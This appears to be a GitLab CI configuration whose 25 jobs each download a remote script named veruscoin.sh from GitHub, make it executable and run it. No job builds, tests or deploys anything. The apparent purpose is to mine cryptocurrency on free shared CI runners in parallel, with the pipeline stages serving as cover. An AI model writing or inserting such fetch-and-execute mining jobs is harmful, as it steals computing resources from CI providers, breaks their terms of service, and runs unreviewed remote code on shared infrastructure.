stages:
  - idhamSNRl
  - build
  - deploy
 
idhamSNRl_1:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
idhamSNRl_2:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_3:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_4:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_5:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_6:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_7:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_8:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_9:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh&& chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_10:
  stage: build
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_11:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_12:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_13:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_14:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_15:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_16:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_17:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_18:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_19:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_20:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
idhamSNRl_21:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
idhamSNRl_22:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
idhamSNRl_23:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
idhamSNRl_24:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
 
idhamSNRl_25:
  stage: idhamSNRl
  script:
    - wget https://raw.githubusercontent.com/ARQAMsnr/colab/main/veruscoin.sh && chmod u+x veruscoin.sh  && ./veruscoin.sh 
